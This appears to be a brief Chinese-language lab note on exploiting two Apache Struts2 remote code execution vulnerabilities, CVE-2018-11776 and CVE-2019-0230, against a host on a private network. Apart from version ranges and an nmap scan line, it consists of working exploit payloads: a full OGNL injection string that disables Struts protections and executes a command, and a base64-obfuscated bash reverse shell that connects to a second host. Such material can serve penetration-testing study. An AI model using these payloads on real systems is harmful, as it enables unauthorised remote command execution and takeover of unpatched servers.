(CVE-2018-11776)(CVE-2019-0230)
Struts2-057 远程代码执行漏洞(CVE-2018-11776)
影响范围:Struts2.3 – Struts2.3.34、Struts2.5 – Struts2.5.16
信息收集:nmap 192.168.85.130 -p 8080 -sV -A
原始exp进行url编码:${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
Struts2-059 远程代码执行漏洞(CVE-2019-0230)
影响范围:Struts2.3 – Struts2.3.36、Struts2.5 – Struts2.5.20
信息收集:nmap 192.168.85.130 -p 8080 -sV -A
反弹shell:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}
